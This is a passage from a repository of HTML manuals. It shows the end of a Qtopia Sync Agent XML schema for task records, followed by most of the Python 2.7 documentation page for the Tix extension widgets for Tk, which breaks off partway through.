to the device when true. If parsed by an outlook plugin, it is local to the outlook plugin if true. This is used to indicate to the parser when the id needs to be mapped. &lt;/xs:documentation&gt; &lt;/xs:annotation&gt; &lt;xs:simpleContent&gt; &lt;xs:extension base=&quot;xs:string&quot;&gt; &lt;xs:attribute name=&quot;localIdentifier&quot; type=&quot;xs:boolean&quot; use=&quot;optional&quot; default=&quot;true&quot;/&gt; &lt;/xs:extension&gt; &lt;/xs:simpleContent&gt; &lt;/xs:complexType&gt; &lt;xs:element name=&quot;Task&quot;&gt; &lt;xs:complexType&gt; &lt;xs:sequence&gt; &lt;xs:element name=&quot;Identifier&quot; type=&quot;identifierType&quot;/&gt; &lt;xs:element name=&quot;Description&quot; type=&quot;xs:string&quot; minOccurs=&quot;0&quot;/&gt; &lt;xs:element name=&quot;Priority&quot; type=&quot;priorityType&quot; /&gt; &lt;xs:element name=&quot;Status&quot; type=&quot;statusType&quot; /&gt; &lt;xs:element name=&quot;DueDate&quot; type=&quot;xs:date&quot; minOccurs=&quot;0&quot;/&gt; &lt;xs:element name=&quot;StartedDate&quot; type=&quot;xs:date&quot; minOccurs=&quot;0&quot;/&gt; &lt;xs:element name=&quot;CompletedDate&quot; type=&quot;xs:date&quot; minOccurs=&quot;0&quot;/&gt; &lt;xs:element name=&quot;PercentCompleted&quot; type=&quot;xs:integer&quot; /&gt; &lt;xs:element name=&quot;Notes&quot; type=&quot;xs:string&quot; minOccurs=&quot;0&quot;/&gt; &lt;xs:element name=&quot;Categories&quot; minOccurs=&quot;0&quot;&gt; &lt;xs:complexType&gt; &lt;xs:sequence&gt; &lt;xs:element name=&quot;Category&quot; type=&quot;xs:string&quot; minOccurs=&quot;0&quot; maxOccurs=&quot;unbounded&quot;/&gt; &lt;/xs:sequence&gt; &lt;xs:attribute name=&quot;maxItems&quot; use=&quot;optional&quot; type=&quot;xs:positiveInteger&quot;/&gt; &lt;/xs:complexType&gt; &lt;/xs:element&gt; &lt;xs:element name=&quot;CustomFields&quot; minOccurs=&quot;0&quot;&gt; &lt;xs:complexType&gt; &lt;xs:sequence&gt; &lt;xs:element name=&quot;Field&quot; minOccurs=&quot;0&quot; maxOccurs=&quot;unbounded&quot;&gt; &lt;xs:complexType&gt; &lt;xs:sequence&gt; &lt;xs:element name=&quot;Key&quot; type=&quot;xs:string&quot;/&gt; &lt;xs:element name=&quot;Value&quot; type=&quot;xs:string&quot;/&gt; &lt;/xs:sequence&gt; &lt;/xs:complexType&gt; &lt;/xs:element&gt; &lt;/xs:sequence&gt; &lt;xs:attribute name=&quot;maxItems&quot; use=&quot;optional&quot; type=&quot;xs:positiveInteger&quot;/&gt; &lt;/xs:complexType&gt; &lt;/xs:element&gt; &lt;/xs:sequence&gt; &lt;/xs:complexType&gt; &lt;xs:key name=&quot;CustomFieldKey&quot;&gt; &lt;xs:selector xpath=&quot;CustomFields/Field&quot;/&gt; &lt;xs:field xpath=&quot;Key&quot;/&gt; &lt;/xs:key&gt; &lt;xs:key name=&quot;CategoryUnique&quot;&gt; &lt;xs:selector xpath=&quot;Categories/Category&quot;/&gt; &lt;xs:field xpath=&quot;.&quot;/&gt; &lt;/xs:key&gt; &lt;/xs:element&gt; &lt;/xs:schema&gt;</pre> <p /><address><hr /><div align="center"> <table width="100%" cellspacing="0" border="0"><tr class="address"> <td align="left">Copyright &copy; 2008 Trolltech</td> <td align="right">Qtopia Sync Agent Documentation</td> </tr></table></div></address></body> </html>
Coding/Python/python-2.7.11rc1-docs-html/library/tix.html
platinhom/ManualHom
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>24.3. Tix — Extension widgets for Tk &mdash; Python 2.7.11rc1 documentation</title> <link rel="stylesheet" href="../static_/default.css" type="text/css" /> <link rel="stylesheet" href="../static_/pygments.css" type="text/css" /> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../', VERSION: '2.7.11rc1', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script type="text/javascript" src="../static_/jquery.js"></script> <script type="text/javascript" src="../static_/underscore.js"></script> <script type="text/javascript" src="../static_/doctools.js"></script> <script type="text/javascript" src="../static_/sidebar.js"></script> <link rel="search" type="application/opensearchdescription+xml" title="Search within Python 2.7.11rc1 documentation" href="../static_/opensearch.xml"/> <link rel="author" title="About these documents" href="../about.html" /> <link rel="copyright" title="Copyright" href="../copyright.html" /> <link rel="top" title="Python 2.7.11rc1 documentation" href="../index.html" /> <link rel="up" title="24. Graphical User Interfaces with Tk" href="tk.html" /> <link rel="next" title="24.4. ScrolledText — Scrolled Text Widget" href="scrolledtext.html" /> <link rel="prev" title="24.2. ttk — Tk themed widgets" href="ttk.html" /> <link rel="shortcut icon" type="image/png" href="../static_/py.png" /> <script type="text/javascript" src="../static_/copybutton.js"></script> <script type="text/javascript" src="../static_/version_switch.js"></script> </head> <body> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="scrolledtext.html" title="24.4. ScrolledText — Scrolled Text Widget" accesskey="N">next</a> |</li> <li class="right" > <a href="ttk.html" title="24.2. ttk — Tk themed widgets" accesskey="P">previous</a> |</li> <li><img src="../static_/py.png" alt="" style="vertical-align: middle; margin-top: -1px"/></li> <li><a href="https://www.python.org/">Python</a> &raquo;</li> <li> <span class="version_switcher_placeholder">2.7.11rc1</span> <a href="../index.html">Documentation</a> &raquo; </li> <li><a href="index.html" >The Python Standard Library</a> &raquo;</li> <li><a href="tk.html" accesskey="U">24. Graphical User Interfaces with Tk</a> &raquo;</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="section" id="module-Tix"> <span id="tix-extension-widgets-for-tk"></span><h1>24.3. <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> &#8212; Extension widgets for Tk<a class="headerlink" href="#module-Tix" title="Permalink to this headline">¶</a></h1> <p id="index-0">The <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> (Tk Interface Extension) module provides an additional rich set of widgets. Although the standard Tk library has many useful widgets, they are far from complete. The <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> library provides most of the commonly needed widgets that are missing from standard Tk: <a class="reference internal" href="#Tix.HList" title="Tix.HList"><tt class="xref py py-class docutils literal"><span class="pre">HList</span></tt></a>, <a class="reference internal" href="#Tix.ComboBox" title="Tix.ComboBox"><tt class="xref py py-class docutils literal"><span class="pre">ComboBox</span></tt></a>, <a class="reference internal" href="#Tix.Control" title="Tix.Control"><tt class="xref py py-class docutils literal"><span class="pre">Control</span></tt></a> (a.k.a. SpinBox) and an assortment of scrollable widgets. <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> also includes many more widgets that are generally useful in a wide range of applications: <a class="reference internal" href="#Tix.NoteBook" title="Tix.NoteBook"><tt class="xref py py-class docutils literal"><span class="pre">NoteBook</span></tt></a>, <a class="reference internal" href="#Tix.FileEntry" title="Tix.FileEntry"><tt class="xref py py-class docutils literal"><span class="pre">FileEntry</span></tt></a>, <a class="reference internal" href="#Tix.PanedWindow" title="Tix.PanedWindow"><tt class="xref py py-class docutils literal"><span class="pre">PanedWindow</span></tt></a>, etc; there are more than 40 of them.</p> <p>With all these new widgets, you can introduce new interaction techniques into applications, creating more useful and more intuitive user interfaces. You can design your application by choosing the most appropriate widgets to match the special needs of your application and users.</p> <div class="admonition note"> <p class="first admonition-title">Note</p> <p class="last"><a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> has been renamed to <tt class="xref py py-mod docutils literal"><span class="pre">tkinter.tix</span></tt> in Python 3. The <a class="reference internal" href="../glossary.html#term-to3"><em class="xref std std-term">2to3</em></a> tool will automatically adapt imports when converting your sources to Python 3.</p> </div> <div class="admonition seealso"> <p class="first admonition-title">See also</p> <dl class="last docutils"> <dt><a class="reference external" href="http://tix.sourceforge.net/">Tix Homepage</a></dt> <dd>The home page for <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a>. This includes links to additional documentation and downloads.</dd> <dt><a class="reference external" href="http://tix.sourceforge.net/dist/current/man/">Tix Man Pages</a></dt> <dd>On-line version of the man pages and reference material.</dd> <dt><a class="reference external" href="http://tix.sourceforge.net/dist/current/docs/tix-book/tix.book.html">Tix Programming Guide</a></dt> <dd>On-line version of the programmer&#8217;s reference material.</dd> <dt><a class="reference external" href="http://tix.sourceforge.net/Tixapps/src/Tide.html">Tix Development Applications</a></dt> <dd>Tix applications for development of Tix and Tkinter programs. Tide applications work under Tk or Tkinter, and include <strong class="program">TixInspect</strong>, an inspector to remotely modify and debug Tix/Tk/Tkinter applications.</dd> </dl> </div> <div class="section" id="using-tix"> <h2>24.3.1. Using Tix<a class="headerlink" href="#using-tix" title="Permalink to this headline">¶</a></h2> <dl class="class"> <dt id="Tix.Tix"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Tix</tt><big>(</big><em>screenName</em><span class="optional">[</span>, <em>baseName</em><span class="optional">[</span>, <em>className</em><span class="optional">]</span><span class="optional">]</span><big>)</big><a class="headerlink" href="#Tix.Tix" title="Permalink to this definition">¶</a></dt> <dd><p>Toplevel widget of Tix which represents mostly the main window of an application. It has an associated Tcl interpreter.</p> <p>Classes in the <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> module subclasses the classes in the <a class="reference internal" href="tkinter.html#module-Tkinter" title="Tkinter: Interface to Tcl/Tk for graphical user interfaces"><tt class="xref py py-mod docutils literal"><span class="pre">Tkinter</span></tt></a> module. The former imports the latter, so to use <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> with Tkinter, all you need to do is to import one module. In general, you can just import <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a>, and replace the toplevel call to <a class="reference internal" href="tkinter.html#Tkinter.Tk" title="Tkinter.Tk"><tt class="xref py py-class docutils literal"><span class="pre">Tkinter.Tk</span></tt></a> with <tt class="xref py py-class docutils literal"><span class="pre">Tix.Tk</span></tt>:</p> <div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">Tix</span> <span class="kn">from</span> <span class="nn">Tkconstants</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">root</span> <span class="o">=</span> <span class="n">Tix</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span> </pre></div> </div> </dd></dl> <p>To use <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a>, you must have the <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> widgets installed, usually alongside your installation of the Tk widgets. To test your installation, try the following:</p> <div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">Tix</span> <span class="n">root</span> <span class="o">=</span> <span class="n">Tix</span><span class="o">.</span><span class="n">Tk</span><span class="p">()</span> <span class="n">root</span><span class="o">.</span><span class="n">tk</span><span class="o">.</span><span class="n">eval</span><span class="p">(</span><span class="s">&#39;package require Tix&#39;</span><span class="p">)</span> </pre></div> </div> <p>If this fails, you have a Tk installation problem which must be resolved before proceeding. Use the environment variable <span class="target" id="index-1"></span><tt class="xref std std-envvar docutils literal"><span class="pre">TIX_LIBRARY</span></tt> to point to the installed <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> library directory, and make sure you have the dynamic object library (<tt class="file docutils literal"><span class="pre">tix8183.dll</span></tt> or <tt class="file docutils literal"><span class="pre">libtix8183.so</span></tt>) in the same directory that contains your Tk dynamic object library (<tt class="file docutils literal"><span class="pre">tk8183.dll</span></tt> or <tt class="file docutils literal"><span class="pre">libtk8183.so</span></tt>). The directory with the dynamic object library should also have a file called <tt class="file docutils literal"><span class="pre">pkgIndex.tcl</span></tt> (case sensitive), which contains the line:</p> <div class="highlight-python"><div class="highlight"><pre>package ifneeded Tix 8.1 [list load &quot;[file join $dir tix8183.dll]&quot; Tix] </pre></div> </div> </div> <div class="section" id="tix-widgets"> <h2>24.3.2. Tix Widgets<a class="headerlink" href="#tix-widgets" title="Permalink to this headline">¶</a></h2> <p><a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/TixIntro.htm">Tix</a> introduces over 40 widget classes to the <a class="reference internal" href="tkinter.html#module-Tkinter" title="Tkinter: Interface to Tcl/Tk for graphical user interfaces"><tt class="xref py py-mod docutils literal"><span class="pre">Tkinter</span></tt></a> repertoire. There is a demo of all the <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> widgets in the <tt class="file docutils literal"><span class="pre">Demo/tix</span></tt> directory of the standard distribution.</p> <div class="section" id="basic-widgets"> <h3>24.3.2.1. Basic Widgets<a class="headerlink" href="#basic-widgets" title="Permalink to this headline">¶</a></h3> <dl class="class"> <dt id="Tix.Balloon"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Balloon</tt><a class="headerlink" href="#Tix.Balloon" title="Permalink to this definition">¶</a></dt> <dd><p>A <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixBalloon.htm">Balloon</a> that pops up over a widget to provide help. When the user moves the cursor inside a widget to which a Balloon widget has been bound, a small pop-up window with a descriptive message will be shown on the screen.</p> </dd></dl> <dl class="class"> <dt id="Tix.ButtonBox"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">ButtonBox</tt><a class="headerlink" href="#Tix.ButtonBox" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixButtonBox.htm">ButtonBox</a> widget creates a box of buttons, such as is commonly used for <tt class="docutils literal"><span class="pre">Ok</span> <span class="pre">Cancel</span></tt>.</p> </dd></dl> <dl class="class"> <dt id="Tix.ComboBox"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">ComboBox</tt><a class="headerlink" href="#Tix.ComboBox" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixComboBox.htm">ComboBox</a> widget is similar to the combo box control in MS Windows. The user can select a choice by either typing in the entry subwdget or selecting from the listbox subwidget.</p> </dd></dl> <dl class="class"> <dt id="Tix.Control"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Control</tt><a class="headerlink" href="#Tix.Control" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixControl.htm">Control</a> widget is also known as the <tt class="xref py py-class docutils literal"><span class="pre">SpinBox</span></tt> widget. The user can adjust the value by pressing the two arrow buttons or by entering the value directly into the entry. The new value will be checked against the user-defined upper and lower limits.</p> </dd></dl> <dl class="class"> <dt id="Tix.LabelEntry"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">LabelEntry</tt><a class="headerlink" href="#Tix.LabelEntry" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixLabelEntry.htm">LabelEntry</a> widget packages an entry widget and a label into one mega widget. It can be used be used to simplify the creation of &#8220;entry-form&#8221; type of interface.</p> </dd></dl> <dl class="class"> <dt id="Tix.LabelFrame"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">LabelFrame</tt><a class="headerlink" href="#Tix.LabelFrame" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixLabelFrame.htm">LabelFrame</a> widget packages a frame widget and a label into one mega widget. To create widgets inside a LabelFrame widget, one creates the new widgets relative to the <tt class="xref py py-attr docutils literal"><span class="pre">frame</span></tt> subwidget and manage them inside the <tt class="xref py py-attr docutils literal"><span class="pre">frame</span></tt> subwidget.</p> </dd></dl> <dl class="class"> <dt id="Tix.Meter"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Meter</tt><a class="headerlink" href="#Tix.Meter" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixMeter.htm">Meter</a> widget can be used to show the progress of a background job which may take a long time to execute.</p> </dd></dl> <dl class="class"> <dt id="Tix.OptionMenu"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">OptionMenu</tt><a class="headerlink" href="#Tix.OptionMenu" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixOptionMenu.htm">OptionMenu</a> creates a menu button of options.</p> </dd></dl> <dl class="class"> <dt id="Tix.PopupMenu"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">PopupMenu</tt><a class="headerlink" href="#Tix.PopupMenu" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixPopupMenu.htm">PopupMenu</a> widget can be used as a replacement of the <tt class="docutils literal"><span class="pre">tk_popup</span></tt> command. The advantage of the <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> <a class="reference internal" href="#Tix.PopupMenu" title="Tix.PopupMenu"><tt class="xref py py-class docutils literal"><span class="pre">PopupMenu</span></tt></a> widget is it requires less application code to manipulate.</p> </dd></dl> <dl class="class"> <dt id="Tix.Select"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Select</tt><a class="headerlink" href="#Tix.Select" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixSelect.htm">Select</a> widget is a container of button subwidgets. It can be used to provide radio-box or check-box style of selection options for the user.</p> </dd></dl> <dl class="class"> <dt id="Tix.StdButtonBox"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">StdButtonBox</tt><a class="headerlink" href="#Tix.StdButtonBox" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixStdButtonBox.htm">StdButtonBox</a> widget is a group of standard buttons for Motif-like dialog boxes.</p> </dd></dl> </div> <div class="section" id="file-selectors"> <h3>24.3.2.2. File Selectors<a class="headerlink" href="#file-selectors" title="Permalink to this headline">¶</a></h3> <dl class="class"> <dt id="Tix.DirList"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">DirList</tt><a class="headerlink" href="#Tix.DirList" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixDirList.htm">DirList</a> widget displays a list view of a directory, its previous directories and its sub-directories. The user can choose one of the directories displayed in the list or change to another directory.</p> </dd></dl> <dl class="class"> <dt id="Tix.DirTree"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">DirTree</tt><a class="headerlink" href="#Tix.DirTree" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixDirTree.htm">DirTree</a> widget displays a tree view of a directory, its previous directories and its sub-directories. The user can choose one of the directories displayed in the list or change to another directory.</p> </dd></dl> <dl class="class"> <dt id="Tix.DirSelectDialog"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">DirSelectDialog</tt><a class="headerlink" href="#Tix.DirSelectDialog" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixDirSelectDialog.htm">DirSelectDialog</a> widget presents the directories in the file system in a dialog window. The user can use this dialog window to navigate through the file system to select the desired directory.</p> </dd></dl> <dl class="class"> <dt id="Tix.DirSelectBox"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">DirSelectBox</tt><a class="headerlink" href="#Tix.DirSelectBox" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference internal" href="#Tix.DirSelectBox" title="Tix.DirSelectBox"><tt class="xref py py-class docutils literal"><span class="pre">DirSelectBox</span></tt></a> is similar to the standard Motif(TM) directory-selection box. It is generally used for the user to choose a directory. DirSelectBox stores the directories mostly recently selected into a ComboBox widget so that they can be quickly selected again.</p> </dd></dl> <dl class="class"> <dt id="Tix.ExFileSelectBox"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">ExFileSelectBox</tt><a class="headerlink" href="#Tix.ExFileSelectBox" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixExFileSelectBox.htm">ExFileSelectBox</a> widget is usually embedded in a tixExFileSelectDialog widget. It provides an convenient method for the user to select files. The style of the <a class="reference internal" href="#Tix.ExFileSelectBox" title="Tix.ExFileSelectBox"><tt class="xref py py-class docutils literal"><span class="pre">ExFileSelectBox</span></tt></a> widget is very similar to the standard file dialog on MS Windows 3.1.</p> </dd></dl> <dl class="class"> <dt id="Tix.FileSelectBox"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">FileSelectBox</tt><a class="headerlink" href="#Tix.FileSelectBox" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixFileSelectBox.htm">FileSelectBox</a> is similar to the standard Motif(TM) file-selection box. It is generally used for the user to choose a file. FileSelectBox stores the files mostly recently selected into a <a class="reference internal" href="#Tix.ComboBox" title="Tix.ComboBox"><tt class="xref py py-class docutils literal"><span class="pre">ComboBox</span></tt></a> widget so that they can be quickly selected again.</p> </dd></dl> <dl class="class"> <dt id="Tix.FileEntry"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">FileEntry</tt><a class="headerlink" href="#Tix.FileEntry" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixFileEntry.htm">FileEntry</a> widget can be used to input a filename. The user can type in the filename manually. Alternatively, the user can press the button widget that sits next to the entry, which will bring up a file selection dialog.</p> </dd></dl> </div> <div class="section" id="hierarchical-listbox"> <h3>24.3.2.3. Hierarchical ListBox<a class="headerlink" href="#hierarchical-listbox" title="Permalink to this headline">¶</a></h3> <dl class="class"> <dt id="Tix.HList"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">HList</tt><a class="headerlink" href="#Tix.HList" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixHList.htm">HList</a> widget can be used to display any data that have a hierarchical structure, for example, file system directory trees. The list entries are indented and connected by branch lines according to their places in the hierarchy.</p> </dd></dl> <dl class="class"> <dt id="Tix.CheckList"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">CheckList</tt><a class="headerlink" href="#Tix.CheckList" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixCheckList.htm">CheckList</a> widget displays a list of items to be selected by the user. CheckList acts similarly to the Tk checkbutton or radiobutton widgets, except it is capable of handling many more items than checkbuttons or radiobuttons.</p> </dd></dl> <dl class="class"> <dt id="Tix.Tree"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">Tree</tt><a class="headerlink" href="#Tix.Tree" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixTree.htm">Tree</a> widget can be used to display hierarchical data in a tree form. The user can adjust the view of the tree by opening or closing parts of the tree.</p> </dd></dl> </div> <div class="section" id="tabular-listbox"> <h3>24.3.2.4. Tabular ListBox<a class="headerlink" href="#tabular-listbox" title="Permalink to this headline">¶</a></h3> <dl class="class"> <dt id="Tix.TList"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">TList</tt><a class="headerlink" href="#Tix.TList" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixTList.htm">TList</a> widget can be used to display data in a tabular format. The list entries of a <a class="reference internal" href="#Tix.TList" title="Tix.TList"><tt class="xref py py-class docutils literal"><span class="pre">TList</span></tt></a> widget are similar to the entries in the Tk listbox widget. The main differences are (1) the <a class="reference internal" href="#Tix.TList" title="Tix.TList"><tt class="xref py py-class docutils literal"><span class="pre">TList</span></tt></a> widget can display the list entries in a two dimensional format and (2) you can use graphical images as well as multiple colors and fonts for the list entries.</p> </dd></dl> </div> <div class="section" id="manager-widgets"> <h3>24.3.2.5. Manager Widgets<a class="headerlink" href="#manager-widgets" title="Permalink to this headline">¶</a></h3> <dl class="class"> <dt id="Tix.PanedWindow"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">PanedWindow</tt><a class="headerlink" href="#Tix.PanedWindow" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixPanedWindow.htm">PanedWindow</a> widget allows the user to interactively manipulate the sizes of several panes. The panes can be arranged either vertically or horizontally. The user changes the sizes of the panes by dragging the resize handle between two panes.</p> </dd></dl> <dl class="class"> <dt id="Tix.ListNoteBook"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">ListNoteBook</tt><a class="headerlink" href="#Tix.ListNoteBook" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixListNoteBook.htm">ListNoteBook</a> widget is very similar to the <tt class="xref py py-class docutils literal"><span class="pre">TixNoteBook</span></tt> widget: it can be used to display many windows in a limited space using a notebook metaphor. The notebook is divided into a stack of pages (windows). At one time only one of these pages can be shown. The user can navigate through these pages by choosing the name of the desired page in the <tt class="xref py py-attr docutils literal"><span class="pre">hlist</span></tt> subwidget.</p> </dd></dl> <dl class="class"> <dt id="Tix.NoteBook"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">NoteBook</tt><a class="headerlink" href="#Tix.NoteBook" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixNoteBook.htm">NoteBook</a> widget can be used to display many windows in a limited space using a notebook metaphor. The notebook is divided into a stack of pages. At one time only one of these pages can be shown. The user can navigate through these pages by choosing the visual &#8220;tabs&#8221; at the top of the NoteBook widget.</p> </dd></dl> </div> <div class="section" id="image-types"> <h3>24.3.2.6. Image Types<a class="headerlink" href="#image-types" title="Permalink to this headline">¶</a></h3> <p>The <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> module adds:</p> <ul class="simple"> <li><a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/pixmap.htm">pixmap</a> capabilities to all <a class="reference internal" href="#module-Tix" title="Tix: Tk Extension Widgets for Tkinter"><tt class="xref py py-mod docutils literal"><span class="pre">Tix</span></tt></a> and <a class="reference internal" href="tkinter.html#module-Tkinter" title="Tkinter: Interface to Tcl/Tk for graphical user interfaces"><tt class="xref py py-mod docutils literal"><span class="pre">Tkinter</span></tt></a> widgets to create color images from XPM files.</li> <li><a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/compound.htm">Compound</a> image types can be used to create images that consists of multiple horizontal lines; each line is composed of a series of items (texts, bitmaps, images or spaces) arranged from left to right. For example, a compound image can be used to display a bitmap and a text string simultaneously in a Tk <tt class="xref py py-class docutils literal"><span class="pre">Button</span></tt> widget.</li> </ul> </div> <div class="section" id="miscellaneous-widgets"> <h3>24.3.2.7. Miscellaneous Widgets<a class="headerlink" href="#miscellaneous-widgets" title="Permalink to this headline">¶</a></h3> <dl class="class"> <dt id="Tix.InputOnly"> <em class="property">class </em><tt class="descclassname">Tix.</tt><tt class="descname">InputOnly</tt><a class="headerlink" href="#Tix.InputOnly" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference external" href="http://tix.sourceforge.net/dist/current/man/html/TixCmd/tixInputOnly.htm">InputOnly</a> widgets are to accept inputs from the user, which can be done with the <tt class="docutils literal"><span class="pre">bind</span></tt> command (Unix only).</p> </dd></dl> </div> <div class="section" id="form-geometry-manager"> <h3>24.3.2.8. Form Geometry Manager<a class="headerlink" 